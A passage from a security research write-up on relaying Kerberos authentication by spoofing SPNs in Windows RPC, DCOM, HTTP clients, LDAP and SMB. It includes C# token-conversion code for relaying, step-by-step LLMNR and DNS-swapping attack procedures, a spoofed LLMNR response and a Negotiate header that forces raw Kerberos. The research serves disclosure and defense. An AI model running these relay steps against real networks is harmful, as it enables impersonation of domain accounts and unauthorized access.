If a client queries for the SPN from a malicious RPC server it will authenticate using a Kerberos AP_REQ for an SPN fully under the attacker's control. Whether the AP_REQ has integrity or confidentiality enabled depends on the authentication level set during the call to RpcBindingSetAuthInfo. If this is set to RPC_C_AUTHN_LEVEL_CONNECT and the client uses RPC_C_AUTHN_GSS_KERBEROS then the AP_REQ won't have integrity enabled. However, if Negotiate is used or anything above RPC_C_AUTHN_LEVEL_CONNECT as a level is used then it will have the integrity/confidentiality flags set.

Doing a quick scan in system32 the following DLLs call the RpcMgmtInqServerPrincName API: certcli.dll, dot3api.dll, dusmsvc.dll, FrameServerClient.dll, L2SecHC.dll, luiapi.dll, msdtcprx.dll, nlaapi.dll, ntfrsapi.dll, w32time.dll, WcnApi.dll, WcnEapAuthProxy.dll, WcnEapPeerProxy.dll, witnesswmiv2provider.dll, wlanapi.dll, wlanext.exe, WLanHC.dll, wlanmsm.dll, wlansvc.dll, wwansvc.dll, wwapi.dll. Some basic analysis shows that none of these clients check the value of the SPN and use it verbatim with RpcBindingSetAuthInfo. That said, they all seem to use RPC_C_AUTHN_GSS_NEGOTIATE and set the authentication level to RPC_C_AUTHN_LEVEL_PKT_PRIVACY which makes them less useful as an attack vector.

If the client specifies RPC_C_AUTHN_GSS_NEGOTIATE but does not specify an SPN then the runtime generates one automatically. This is based on the target hostname with the RestrictedKrbHost service class. The runtime doesn't process the hostname, it just concatenates strings and for some reason the runtime doesn't support generating the SPN for RPC_C_AUTHN_GSS_KERBEROS.

One additional quirk of the RPC runtime is that the request attribute flag ISC_REQ_USE_DCE_STYLE is used when calling InitializeSecurityContext. This enables a special three-leg authentication mode which results in the server sending back an AP_RET and then receiving another AP_RET from the client. Until that third AP_RET has been provided to the server it won't consider the authentication complete so it's not sufficient to just forward the initial AP_REQ token and close the connection to the client. This just makes the relay code slightly more complex but not impossible.

A second change that ISC_REQ_USE_DCE_STYLE introduces is that the Kerberos AP_REQ token does not have an GSS-API wrapper. This causes the call to NegpDetermineTokenPackage to fail to detect the package in use, making it impossible to directly forward the traffic to a server using the Negotiate package. However, this prefix is not protected against modification so the relay code can append the appropriate value before forwarding to the server. For example the following C# code can be used to convert a DCE style AP_REQ to a GSS-API format which Negotiate will accept.

public static byte[] EncodeLength(int length)

{

    if (length < 0x80)

        return new byte[] { (byte)length };

    if (length < 0x100)

        return new byte[] { 0x81, (byte)length };

    if (length < 0x10000)

        return new byte[] { 0x82, (byte)(length >> 8),

                            (byte)(length & 0xFF) };

    throw new ArgumentException("Invalid length", nameof(length));

}

public static byte[] ConvertApReq(byte[] token)

{

    if (token.Length == 0 || token[0] != 0x6E)

        return token;

    MemoryStream stm = new MemoryStream();

    BinaryWriter writer = new BinaryWriter(stm);

    Console.WriteLine("Converting DCE AP_REQ to GSS-API format.");

    byte[] header = new byte[] { 0x06, 0x09, 0x2a, 0x86, 0x48,

       0x86, 0xf7, 0x12, 0x01, 0x02, 0x02, 0x01, 0x00 };

    writer.Write((byte)0x60);

    writer.Write(EncodeLength(header.Length + token.Length));

    writer.Write(header);

    writer.Write(token);

    return stm.ToArray();

}

Subsequent tokens in the authentication process don't need to be wrapped; in fact, wrapping them with their GSS-API headers will cause the authentication to fail. Relaying MSRPC requests would probably be difficult just due to the relative lack of clients which request the server's SPN. Also when the SPN is requested it tends to be a conscious act of securing the client and so best practice tends to require the developer to set the maximum authentication level, making the Kerberos AP_REQ less useful.

DCOM

The DCOM protocol uses MSRPC under the hood to access remote COM objects, therefore it should have the same behavior as MSRPC. The big difference is DCOM is designed to automatically handle the authentication requirements of a remote COM object through binding information contained in the DUALSTRINGARRAY returned during Object Exporter ID (OXID) resolving. Therefore the client doesn't need to explicitly call RpcBindingSetAuthInfo to configure the authentication.

The binding information contains the protocol sequence and endpoint to use (such as TCP on port 30000) as well as the security bindings. Each security binding contains the RPC authentication service (wAuthnSvc in the below screenshot) to use as well as an optional SPN (aPrincName) for the authentication. Therefore a malicious DCOM server can force the client to use the RPC_C_AUTHN_GSS_KERBEROS authentication service with a completely arbitrary SPN by returning an appropriate security binding.

Screenshot of part of the MS-DCOM protocol documentation showing the SECURITYBINDING structure

The authentication level chosen by the client depends on the value of the dwAuthnLevel parameter specified if the COM client calls the CoInitializeSecurity API. If the client doesn't explicitly call CoInitializeSecurity then a default will be used which is currently RPC_C_AUTHN_LEVEL_CONNECT. This means neither integrity or confidentiality will be enforced on the Kerberos AP_REQ by default.

One limitation is that without a call to CoInitializeSecurity, the default impersonation level for the client is set to RPC_C_IMP_LEVEL_IDENTIFY. This means the access token generated by the DCOM RPC authentication can only be used for identification and not for impersonation. For some services this isn't an issue, for example LDAP doesn't need an impersonation level token. However for others such as SMB this would prevent access to files. It's possible that you could find a COM client which sets both RPC_C_AUTHN_LEVEL_CONNECT and RPC_C_IMP_LEVEL_IMPERSONATE though there's no trivial process to assess that.

Getting a client to connect to the server isn't trivial as DCOM isn't a widely used protocol on modern Windows networks due to high authentication requirements. However, one use case for this is local privilege escalation. For example you could get a privileged service to connect to the malicious COM server and relay the computer account Kerberos AP_REQ which is generated. I have a working PoC for this which allows a local non-admin user to connect to the domain's LDAP server using the local computer's credentials.

This attack is somewhat similar to the RemotePotato attack (which uses NTLM rather than Kerberos) which again Microsoft have refused to fix. I'll describe this in more detail in a separate blog post after this one.

HTTP

HTTP has supported NTLM and Negotiate authentication for a long time (see this draft from 2002 although the most recent RFC is 4559 from 2006). To initiate a Windows authentication session the server can respond to a request with the status code 401 and specify a WWW-Authenticate header with the value Negotiate. If the client supports Windows authentication it can use InitializeSecurityContext to generate a token, convert the binary token into a Base64 string and send it in the next request to the server with the Authorization header. This process is repeated until the client errors or the authentication succeeds.

In theory only NTLM and Negotiate are defined but a HTTP implementation could use other Windows authentication packages such as Kerberos if it so chose to. Whether the HTTP client will automatically use the user's credentials is up to the user agent or the developer using it as a library.

All the major browsers support both authentication types as well as many non browser HTTP user agents such as those in .NET and WinHTTP. I looked at the following implementations, all running on Windows 10 21H1:

  • WinINET (Internet Explorer 11)
  • WinHTTP (WebClient)
  • Chromium M93 (Chrome and Edge)
  • Firefox 91
  • .NET Framework 4.8
  • .NET 5.0 and 6.0

This is of course not an exhaustive list, and there's likely to be many different HTTP clients in Windows which might have different behaviors. I've also not looked at how non-Windows clients work in this regard.

There's two important behaviors that I wanted to assess with HTTP. First is how the user agent determines when to perform automatic Windows authentication using the current user's credentials. In order to relay the authentication it can't ask the user for their credentials. And second we want to know how the SPN is selected by the user agent when calling InitializeSecurityContext.

WinINET (Internet Explorer 11)

WinINET can be used as a generic library to handle HTTP connections and authentication. There's likely many different users of WinINET but we'll just look at Internet Explorer 11 as that is what it's most known for. WinINET is also the originator of HTTP Negotiate authentication, so it's good to get a baseline of what WinINET does in case other libraries just copied its behavior.

First, how does WinINET determine when it should handle Windows authentication automatically? By default this is based on whether the target host is considered to be in the Intranet Zone. This means any host which bypasses the configured HTTP proxy or uses an undotted name will be considered Intranet zone and WinINET will automatically authenticate using the current user's credentials.

It's possible to disable this behavior by changing the security options for the Intranet Zone to "Prompt for user name and password", as shown below:

Screenshot of the system Internet Options Security Settings showing how to disable automatic authentication

Next, how does WinINET determine the SPN to use for Negotiate authentication? RFC4559 says the following:

'When the Kerberos Version 5 GSSAPI mechanism [RFC4121] is being used, the HTTP server will be using a principal name of the form of "HTTP/hostname"'

You might assume therefore that the HTTP URL that WinINET is connecting to would be sufficient to build the SPN: just use the hostname as provided and combine with the HTTP service class. However it turns out that's not entirely the case. I found a rough description of how IE and WinINET actually generate the SPN in this blog. This blog post is over 10 years old so it was possible that things have changed, however it turns out to not be the case.

The basic approach is that WinINET doesn't necessarily trust the hostname specified in the HTTP URL. Instead it requests the canonical name of the server via DNS. It doesn't seem to explicitly request a CNAME record from the DNS server. Instead it calls getaddrinfo and specifies the AI_CANONNAME hint. Then it uses the returned value of ai_canonname and prefixes it with the HTTP service class. In general ai_canonname is the name provided by the DNS server in the returned A/AAAA record.

For example, if the HTTP URL is http://fileserver.domain.com, but the DNS A record contains the canonical name example.domain.com the generated SPN is HTTP/example.domain.com and not HTTP/fileserver.domain.com. Therefore to provide an arbitrary SPN you need to get the name in the DNS address record to differ from the IP address in that record so that IE will connect to a server we control while generating Kerberos authentication for a different target name.

The most obvious technique would be to specify a DNS CNAME record which redirects to another hostname. However, at least if the client is using a Microsoft DNS server (which is likely for a domain environment) then the CNAME record is not directly returned to the client. Instead the DNS server will perform a recursive lookup, and then return the CNAME along with the validated address record to the client.

Therefore, if an attacker sets up a CNAME record for www.evil.com, which redirects to fileserver.domain.com the DNS server will return the CNAME record and an address record for the real IP address of fileserver.domain.com. WinINET will try to connect to the HTTP service on fileserver.domain.com rather than www.evil.com which is what is needed for the attack to function.

I tried various ways of tricking the DNS client into making a direct request to a DNS server I controlled but I couldn't seem to get it to work. However, it turns out there is a way to get the DNS resolver to accept arbitrary DNS responses, via local DNS resolution protocols such as Multicast DNS (MDNS) and Link-Local Multicast Name Resolution (LLMNR).

These two protocols use a lightly modified DNS packet structure, so you can return a response to the name resolution request with an address record with the IP address of the malicious web server, but the canonical name of any server. WinINET will then make the HTTP connection to the malicious web server but construct the SPN for the spoofed canonical name. I've verified this with LLMNR and in theory MDNS should work as well.

Is spoofing the canonical name a bug in the Windows DNS client resolver? I don't believe any DNS protocol requires the query name to exactly match the answer name. If the DNS server has a CNAME record for the queried host then there's no obvious requirement for it to return that record when it could just return the address record. Of course if a public DNS server could spoof a host for a DNS zone which it didn't control, that'd be a serious security issue. It's also worth noting that this doesn't spoof the name generally. As the cached DNS entry on Windows is based on the query name, if the client now resolves fileserver.domain.com a new DNS request will be made and the DNS server would return the real address.

Attacking local name resolution protocols is a well known weakness abused for MitM attacks, so it's likely that some security conscious networks will disable the protocols. However, the advantage of using LLMNR this way over its use for MitM is that the resolved name can be anything. As in, normally you'd want to spoof the DNS name of an existing host, in our example you'd spoof the request for the fileserver name. But for registered computers on the network the DNS client will usually satisfy the name resolution via the network's DNS server before ever trying local DNS resolution. Therefore local DNS resolution would never be triggered and it wouldn't be possible to spoof it. For relaying Kerberos authentication we don't care, you can induce a client to connect to an unregistered host name which will fallback to local DNS resolution.

The big problem with the local DNS resolution attack vector is that the attacker must be in the same multicast domain as the victim computer. However, the attacker can still start the process by getting a user to connect to an external domain which looks legitimate then redirect to an undotted name to both force automatic authentication and local DNS resolving.

Diagram of the local DNS resolving attack against WinINET

To summarize the attack process as shown in the above diagram:

  1. The attacker sets up an LLMNR service on a machine in the same multicast domain at the victim computer. The attacker listens for a target name request such as EVILHOST.
  2. Trick the victim to use IE (or another WinINET client, such as via a document format like DOCX) to connect to the attacker's server on http://EVILHOST.
  3. The LLMNR server receives the lookup request and responds by setting the address record's hostname to the SPN target host to spoof and the IP address to the attacker-controlled server.
  4. The WinINET client extracts the spoofed canonical name, appends the HTTP service class to the SPN and requests the Kerberos service ticket. This Kerberos ticket is then sent to the attacker's HTTP service.
  5. The attacker receives the Negotiate/Kerberos authentication for the spoofed SPN and relays it to the real target server.

An example LLMNR response decoded by Wireshark for the name evilhost (with IP address 10.0.0.80), spoofing fileserver.domain.com (which is not address 10.0.0.80) is shown below:

Link-local Multicast Name Resolution (response)

    Transaction ID: 0x910f

    Flags: 0x8000 Standard query response, No error

    Questions: 1

    Answer RRs: 1

    Authority RRs: 0

    Additional RRs: 0

    Queries

        evilhost: type A, class IN

            Name: evilhost

            [Name Length: 8]

            [Label Count: 1]

            Type: A (Host Address) (1)

            Class: IN (0x0001)

    Answers

        fileserver.domain.com: type A, class IN, addr 10.0.0.80

            Name: fileserver.domain.com

            Type: A (Host Address) (1)

            Class: IN (0x0001)

            Time to live: 1 (1 second)

            Data length: 4

            Address: 10.0.0.80

You might assume that the SPN always having the HTTP service class would be a problem. However, the Active Directory default SPN mapping will map HTTP to the HOST service class which is always registered. Therefore you can target any domain joined system without needing to register an explicit SPN. As long as the receiving service doesn't then verify the SPN it will work to authenticate to the computer account, which is used by privileged services. You can use the following PowerShell script to list all the configured SPN mappings in a domain.

PS> $base_dn = (Get-ADRootDSE).configurationNamingContext

PS> $dn = "CN=Directory Service,CN=Windows NT,CN=Services,$base_dn"

PS> (Get-ADObject $dn -Properties sPNMappings).sPNMappings

One interesting behavior of WinINET is that it always requests Kerberos delegation, although that will only be useful if the SPN's target account is registered for delegation. I couldn't convince WinINET to default to a Kerberos only mode; sending back a WWW-Authenticate: Kerberos header causes the authentication process to stop. This means the Kerberos AP_REQ will always have Integrity enabled even though the user agent doesn't explicitly request it.

Another user of WinINET is Office. For example you can set a template located on an HTTP URL which will generate local Windows authentication if in the Intranet zone just by opening a Word document. This is probably a good vector for getting the authentication started rather than relying on Internet Explorer being available.

WinINET does have some feature controls which can be enabled on a per-executable basis which affect the behavior of the SPN lookup process, specifically FEATURE_USE_CNAME_FOR_SPN_KB911149 and

FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771. However these only seem to come into play if the HTTP connection is being proxied, which we're assuming isn't the case.

WinHTTP (WebDAV WebClient)

The WinHTTP library is an alternative to using WinINET in a client application. It's a cleaner API and doesn't have the baggage of being used in Internet Explorer. As an example client I chose to use the built-in WebDAV WebClient service because it gives the interesting property that it converts a UNC file name request into a potentially exploitable HTTP request. If the WebClient service is installed and running then opening a file of the form \\EVIL\abc will cause an HTTP request to be sent out to a server under the attacker's control.

From what I can tell the behavior of WinHTTP when used with the WebClient service is almost exactly the same as for WinINET. I could exploit the SPN generation through local DNS resolution, but not from a public DNS name record. WebDAV seems to consider undotted names to be Intranet zone, however the default for WinHTTP seems to depend on whether the connection would bypass the proxy. The automatic authentication decision is based on the value of the WINHTTP_OPTION_AUTOLOGON_POLICY policy.

At least as used with WebDAV WinHTTP handles a WWW-Authenticate header of Kerberos, however it ends up using the Negotiate package regardless and so Integrity will always be enabled. It also enables Kerberos delegation automatically like WinINET.

Chromium M93

Chromium based browsers such as Chrome and Edge are open source so it's a bit easier to check the implementation. By default Chromium will automatically authenticate to intranet zone sites, it uses the same Internet Security Manager used by WinINET to make the zone determination in URLSecurityManagerWin::CanUseDefaultCredentials. An administrator can set GPOs to change this behavior to only allow automatic authentication to a set of hosts.

The SPN is generated in HttpAuthHandlerNegotiate::CreateSPN which is called from HttpAuthHandlerNegotiate::DoResolveCanonicalNameComplete. While the documentation for CreateSPN mentions it's basically a copy of the behavior in IE, it technically isn't. Instead of taking the canonical name from the initial DNS request it does a second DNS request, and the result of that is used to generate the SPN.

This second DNS request is important as it means that we now have a way of exploiting this from a public DNS name. If you set the TTL of the initial host DNS record to a very low value, then it's possible to change the DNS response between the lookup for the host to connect to and the lookup for the canonical name to use for the SPN.

This will also work with local DNS resolution as well, though in that case the response doesn't need to be switched as one response is sufficient. This second DNS lookup behavior can be disabled with a GPO. If this is disabled then neither local DNS resolution nor public DNS will work as Chromium will use the host specified in the URL for the SPN.

In a domain environment where the Chromium browser is configured to only authenticate to Intranet sites we can abuse the fact that by default authenticated users can add new DNS records to the Microsoft DNS server through LDAP (see this blog post by Kevin Robertson). Using the domain's DNS server is useful as the DNS record could be looked up using a short Intranet name rather than a public DNS name meaning it's likely to be considered a target for automatic authentication.

One problem with using LDAP to add the DNS record is the time before the DNS server will refresh its records is at least 180 seconds. This would make it difficult to switch the response from a normal address record to a CNAME record in a short enough time frame to be useful. Instead we can add an NS record to the DNS server which forwards the lookup to our own DNS server. As long as the TTL for the DNS response is short the domain's DNS server will rerequest the record and we can return different responses without any waiting for the DNS server to update from LDAP. This is very similar to DNS rebinding attack, except instead of swapping the IP address, we're swapping the canonical name.

Diagram of two DNS request attack against Chromium

Therefore a working exploit as shown in the diagram would be the following:

  1. Register an NS record with the DNS server for evilhost.domain.com using existing authenticated credentials via LDAP. Wait for the DNS server to pick up the record.
  2. Direct the browser to connect to http://evilhost. This allows Chromium to automatically authenticate as it's an undotted Intranet host. The browser will lookup evilhost.domain.com by adding its primary DNS suffix.
  3. This request goes to the client's DNS server, which then follows the NS record and performs a recursive query to the attacker's DNS server.
  4. The attacker's DNS server returns a normal address record for their HTTP server with a very short TTL.
  5. The browser makes a request to the HTTP server, at this point the attacker delays the response long enough for the cached DNS request to expire. It can then return a 401 to get the browser to authenticate.
  6. The browser makes a second DNS lookup for the canonical name. As the original request has expired, another will be made for evilhost.domain.com. For this lookup the attacker returns a CNAME record for the fileserver.domain.com target. The client's DNS server will look up the IP address for the CNAME host and return that.
  7. The browser will generate the SPN based on the CNAME record and that'll be used to generate the AP_REQ, sending it to the attacker's HTTP server.
  8. The attacker can relay the AP_REQ to the target server.

It's possible that we can combine the local and public DNS attack mechanisms to only need one DNS request. In this case we could set up an NS record to our own DNS server and get the client to resolve the hostname. The client's DNS server would do a recursive query, and at this point our DNS server shouldn't respond immediately. We could then start a classic DNS spoofing attack to return a DNS response packet directly to the client with the spoofed address record.

In general DNS spoofing is limited by requiring the source IP address, transaction ID and the UDP source port to match before the DNS client will accept the response packet. The source IP address should be spoofable on a local network and the client's IP address can be known ahead of time through an initial HTTP connection, so the only problems are the transaction ID and port.

As most clients have a relatively long timeout of 3-5 seconds, that might be enough time to try the majority of the combinations for the ID and port. Of course there isn't really a penalty for trying multiple times. If this attack was practical then you could do the attack on a local network even if local DNS resolution was disabled and enable the attack for libraries which only do a single lookup such as WinINET and WinHTTP. The response could have a long TTL, so that when the access is successful it doesn't need to be repeated for every request.

I couldn't get Chromium to downgrade Negotiate to Kerberos only so Integrity will be enabled. Also since Delegation is not enabled by default, an administrator needs to configure an allow list GPO to specify what targets are allowed to receive delegated credentials.

A bonus quirk for Chromium: It seems to be the only browser which still supports URL based user credentials. If you pass user credentials in the request and get the server to return a request for Negotiate authentication then it'll authenticate automatically regardless of the zone of the site. You can also pass credentials using XMLHttpRequest::open.

While not very practical, this can be used to test a user's password from an arbitrary host. If the username/password is correct and the SPN is spoofed then Chromium will send a validated Kerberos AP_REQ, otherwise either NTLM or no authentication will be sent.

NTLM can be always generated as it doesn't require any proof the password is valid, whereas Kerberos requires the password to be correct to allow the authentication to succeed. You need to specify the domain name when authenticating so you use a URL of the form http://DOMAIN%5CUSER:[email protected].

One other quirk of this is you can specify a fully qualified domain name (FQDN) and user name and the Windows Kerberos implementation will try and authenticate using that server based on the DNS SRV records. For example http://EVIL.COM%5CUSER:[email protected] will try to authenticate to the Kerberos service specified through the _kerberos._tcp.evil.com SRV record. This trick works even on non-domain joined systems to generate Kerberos authentication, however it's not clear if this trick has any practical use.

It's worth noting that I did discuss the implications of the Chromium HTTP vector with team members internally and the general conclusion that this behavior is by design as it's trying to copy the behavior expected of existing user agents such as IE. Therefore there was no expectation it would be fixed.

Firefox 91

As with Chromium, Firefox is open source so we can find the implementation. Unlike the other HTTP implementations researched up to this point, Firefox doesn't perform Windows authentication by default. An administrator needs to configure either a list of hosts that are allowed to automatically authenticate, or the network.negotiate-auth.allow-non-fqdn setting can be enabled to authenticate to non-dotted host names.

If authentication is enabled it works with both local DNS resolving and public DNS as it does a second DNS lookup when constructing the SPN for Negotiate in nsAuthSSPI::MakeSN. Unlike Chromium there doesn't seem to be a setting to disable this behavior.

Once again I couldn't get Firefox to use raw Kerberos, so Integrity is enabled. Also Delegation is not enabled unless an administrator configures the network.negotiate-auth.delegation-uris setting.

.NET Framework 4.8

The .NET Framework 4.8 officially has two HTTP libraries, the original System.Net.HttpWebRequest and derived APIs and the newer System.Net.Http.HttpClient API. However in the .NET framework the newer API uses the older one under the hood, so we'll only consider the older of the two.

Windows authentication is only generated automatically if the UseDefaultCredentials property is set to true on the HttpWebRequest object as shown below (technically this sets the CredentialCache.DefaultCredentials object, but it's easier to use the boolean property). Once the default credentials are set the client will automatically authenticate using Windows authentication to any host, it doesn't seem to care if that host is in the Intranet zone.

var request = WebRequest.CreateHttp("http://www.evil.com");

request.UseDefaultCredentials = true;

var response = (HttpWebResponse)request.GetResponse();

The SPN is generated in the System.Net.AuthenticationState.GetComputeSpn function which we can find in the .NET reference source. The SPN is built from the canonical name returned by the initial DNS lookup, which means it supports the local but not public DNS resolution. If you follow the code it does support doing a second DNS lookup if the host is undotted, however this is only if the client code sets an explicit Host header as far as I can tell. Note that the code here is slightly different in .NET 2.0 which might support looking up the canonical name as long as the host name is undotted, but I've not verified that.

The .NET Framework supports specifying Kerberos directly as the authentication type in the WWW-Authentication header. As the client code doesn't explicitly request integrity, this allows the Kerberos AP_REQ to not have Integrity enabled.

The code also supports the WWW-Authentication header having an initial token, so even if Kerberos wasn't directly supported, you could use Negotiate and specify the stub token I described at the start to force Kerberos authentication. For example returning the following header with the initial 401 status response will force Kerberos through auto-detection:

WWW-Authenticate: Negotiate AAFA

Finally, the authentication code always enables delegation regardless of the target host.

.NET 5.0

The .NET 5.0 runtime has deprecated the HttpWebRequest API in favor of the HttpClient API. It uses a new backend class called the SocketsHttpHandler. As it's all open source we can find the implementation, specifically the AuthenticationHelper class which is a complete rewrite from the .NET Framework version.

To automatically authenticate, the client code must either use the HttpClientHandler class and set the UseDefaultCredentials property as shown below. Or if using SocketsHttpHandler, set the Credentials property to the default credentials. This handler must then be specified when creating the HttpClient object.

var handler = new HttpClientHandler();

handler.UseDefaultCredentials = true;

var client = new HttpClient(handler);

await client.GetStringAsync("http://www.evil.com");

Unless the client specified an explicit Host header in the request the authentication will do a DNS lookup for the canonical name. This is separate from the DNS lookup for the HTTP connection so it supports both local and public DNS attacks.

While the implementation doesn't support Kerberos directly like the .NET Framework, it does support passing an initial token so it's still possible to force raw Kerberos which will disable the Integrity requirement.

.NET 6.0

The .NET 6.0 runtime is basically the same as .NET 5.0, except that Integrity is specified explicitly when creating the client authentication context. This means that rolling back to Kerberos no longer has any advantage. This change seems to be down to a broken implementation of NTLM on macOS and not as some anti-NTLM relay measure.

HTTP Overview

The following table summarizes the results of the HTTP protocol research:

  • The LLMNR column indicates it's possible to influence the SPN using a local DNS resolver attack
  • DNS CNAME indicates a public DNS resolving attack
  • Delegation indicates the HTTP user agent enables Kerberos delegation
  • Integrity indicates that integrity protection is requested which reduces the usefulness of the relayed authentication if the target server automatically detects the setting.

User Agent

LLMNR

DNS CNAME

Delegation

Integrity

Internet Explorer 11 (WinINET)

Yes

No

Yes

Yes

WebDAV (WinHTTP)

Yes

No

Yes

Yes

Chromium (M93)

Yes

Yes

No

Yes

Firefox 91

Yes

Yes

No

Yes

.NET Framework 4.8

Yes

No

Yes

No

.NET 5.0

Yes

Yes

No

No

.NET 6.0

Yes

Yes

No

Yes

† Chromium and Firefox can enable delegation only on a per-site basis through a GPO.

‡ .NET Framework supports DNS resolving in special circumstances for non-dotted hostnames.

By far the most permissive client is .NET 5.0. It supports authenticating to any host as long as it has been configured to authenticate automatically. It also supports arbitrary SPN spoofing from a public DNS name as well as disabling integrity through Kerberos fallback. However, as .NET 5.0 is designed to be something usable cross platform, it's possible that few libraries written with it in mind will ever enable automatic authentication.

LDAP

Windows has a built-in general purpose LDAP library in wldap32.dll. This is used by the majority of OS components when accessing Active Directory and is also used by the .NET LdapConnection class. There doesn't seem to be a way of specifying the SPN manually for the LDAP connection using the API. Instead it's built manually based on the canonical name based on the DNS lookup. Therefore it's exploitable in a similar manner to WinINET via local DNS resolution.

The name of the LDAP server can also be found by querying for a SRV record for the hostname. This is used to support accessing the LDAP server from the top-level Windows domain name. This will usually return an address record alongside, all this does is change the server resolution process which doesn't seem to give any advantages to exploitation.

Whether the LDAP client enables integrity checking is based on the value of the LDAP_OPT_SIGN flag. As the connection only supports Negotiate authentication the client passes the ISC_REQ_NO_INTEGRITY flag if signing is disabled so that the server won't accidentally auto-detect the signing capability enabled for the Negotiate MIC and accidentally enable signing protection.

As part of recent changes to LDAP signing the client is forced to enable Integrity by the LdapClientIntegrity policy. This means that regardless of whether the LDAP server needs integrity protection it'll be enabled on the client which in turn will automatically enable it on the server. Changing the value of LDAP_OPT_SIGN in the client has no effect once this policy is enabled.

SMB

SMB is one of the most commonly exploited protocols for NTLM relay, as it's easy to convert access to a file into authentication. It would be convenient if it was also exploitable for Kerberos relay. While SMBv1 is deprecated and not even installed on newer installs of Windows, it's still worth looking at the implementation of v1 and v2 to determine if either are exploitable.

The client implementations of SMB 1 and 2 are in mrxsmb10.sys and mrxsmb20.sys respectively with some common code in mrxsmb.sys. Both protocols support specifying a name for the SPN which is related to DFS. The SPN name needs to be specified through the GUID_ECP_DOMAIN_SERVICE_NAME_CONTEXT ECP and is only enabled if the NETWORK_OPEN_ECP_OUT_FLAG_RET_MUTUAL_AUTH flag in the GUID_ECP_NETWORK_OPEN_CONTEXT ECP (set by MUP) is specified. This is related to UNC hardening which was added to protect things like group policies.

It's easy enough to trigger the conditions to set the NETWORK_OPEN_ECP_OUT_FLAG_RET_MUTUAL_AUTH flag. The default UNC hardening rules always add SYSVOL and NETLOGON UNC paths with a wildcard hostname. Therefore a request to \\evil.com\SYSVOL will cause the flag to be set and the SPN potentially overridable. The server should be a DFS server for this to work, however even with the flag set I've not found a way of setting an arbitrary SPN value remotely.

Even if you could spoof the SPN, the SMB clients always enable Integrity protection. Like LDAP, SMB will enable signing and encryption opportunistically if available from the client, unless UNC hardening measures are in place.

Marshaled Target Information SPN

While investigating the SMB implementation I noticed something interesting. The SMB clients use the function SecMakeSPNEx2 to build the SPN value from the service class and name. You might assume this would just return the SPN as-is, however that's not the case. Instead for the hostname of fileserver with the service class cifs you get back an SPN which looks like the following:

cifs/fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA

Looking at the implementation of SecMakeSPNEx2 it makes a call to the API function CredMarshalTargetInfo. This API takes a list of target information in a CREDENTIAL_TARGET_INFORMATION structure and marshals it using a base64 string encoding. This marshaled string is then appended to the end of the real SPN.

The code is therefore just appending some additional target information to the end of the SPN, presumably so it's easier to pass around. My initial assumption would be this information is stripped off before passing to the SSPI APIs by the SMB client. However, passing this SPN value to InitializeSecurityContext as the target name succeeds and gets a Kerberos service ticket for cifs/fileserver. How does that work?

Inside the function SspiExProcessSecurityContext in lsasrv.dll, which is the main entrypoint of InitializeSecurityContext, there's a call to the CredUnmarshalTargetInfo API, which parses the marshaled target information. However SspiExProcessSecurityContext doesn't care about the unmarshalled results, instead it just gets the length of the marshaled data and removes that from the end of the target SPN string. Therefore before the Kerberos package gets the target name it has already been restored to the original SPN.

The encoded SPN shown earlier, minus the service class, is a valid DNS component name and therefore could be used as the hostname in a public or local DNS resolution request. This is interesting as this potentially gives a way of spoofing a hostname which is distinct from the real target service, but when processed by the SSPI API requests the spoofed service ticket. As in if you use the string fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA as the DNS name, and if the client appends a service class to the name and passes it to SSPI it will get a service ticket for fileserver, however the DNS resolving can trivially return an unrelated IP address.

There are some big limitations to abusing this behavior. The marshaled target information must be valid, the last 6 characters is an encoded length of the entire marshaled buffer and the buffer is prefixed with a 28 byte header with a magic value of 0x91856535 in the first 4 bytes. If this length is invalid (e.g. larger than the buffer or not a multiple of 2) or the magic isn't present then the CredUnmarshalTargetInfo call fails and SspiExProcessSecurityContext leaves the SPN as is which will subsequently fail to query a Kerberos ticket for the SPN.

The easiest way that the name could be invalid is by it being converted to lowercase. DNS is case insensitive, however generally the servers are case preserving. Therefore you could lookup the case sensitive name and the DNS server would return that unmodified. However the HTTP clients tested all seem to lowercase the hostname before use, therefore by the time it's used to build an SPN it's now a different string. When unmarshalling 'a' and 'A' represent different binary values and so parsing of the marshaled information will fail.

Another issue is that the size limit of a single name in DNS is 63 characters. The minimum valid marshaled buffer is 44 characters long leaving only 19 characters for the SPN part. This is at least larger than the minimum NetBIOS name limit of 15 characters so as long as there's an SPN for that shorter name registered it should be sufficient. However if there's no short SPN name registered then it's going to be more difficult to exploit.

In theory you could specify the SPN using its FQDN. However it's hard to construct such a name. The length value must be at the end of the string and needs to be a valid marshaled value so you can't have any dots within its 6 characters. It's possible to have a TLD which is 6 characters or longer and as the embedded marshaled values are not escaped this can be used to construct a valid FQDN which would then resolve to another SPN target. For example:

fileserver1UWhRCAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAA.domain.oBAAAA

is a valid DNS name which would resolve to an SPN for fileserver. Except that oBAAAA is not a valid public TLD. Pulling the list of valid TLDs from ICANN's website and converting all values which are 6 characters or longer into the expected length value, the smallest length which is a multiple of 2 is from WEBCAM which results in a DNS name at least 264331 characters long, which is somewhat above the 255 character limit usually considered valid for a FQDN in DNS.

Therefore this would still be limited to more local attacks and only for limited sets of protocols. For example an authenticated user could register a DNS entry for the local domain using this value and trick an RPC client to connect to it using its undotted hostname. As long as the client doesn't modify the name other than putting the service class on it (or it gets automatically generated by the RPC runtime) then this spoofs the SPN for the request.

Microsoft's Response to the Research

I didn't initially start looking at Kerberos authentication relay, as mentioned I found it inadvertently when looking at IPsec and AuthIP which I subsequently reported to Microsoft. After doing more research into other network protocols I decided to use the AuthIP issue as a bellwether on Microsoft's views on whether relaying Kerberos authentication and spoofing SPNs would cross a security boundary.

As I mentioned earlier the AuthIP issue was classed as "vNext", which denotes it might be fixed in a future version of Windows, but not as a security update for any currently shipping version of Windows. This was because Microsoft determined it to be a Moderate severity issue (see this for the explanation of the severities). Only Important or above will be serviced.

It seems that the general rule is that any network protocol where the SPN can be spoofed to generate Kerberos authentication which can be relayed, is not sufficient to meet the severity level for a fix. However, any network facing service which can be used to induce authentication where the attacker does not have existing network authentication credentials is considered an Important severity spoofing issue and will be fixed. This is why PetitPotam was fixed as CVE-2021-36942, as it could be exploited from an unauthenticated user.

As my research focused entirely on the network protocols themselves and not the ways of inducing authentication, they will all be covered under the same Moderate severity. This means that if they were to be fixed at all, it'd be in unspecified future versions of Windows.

Available Mitigations

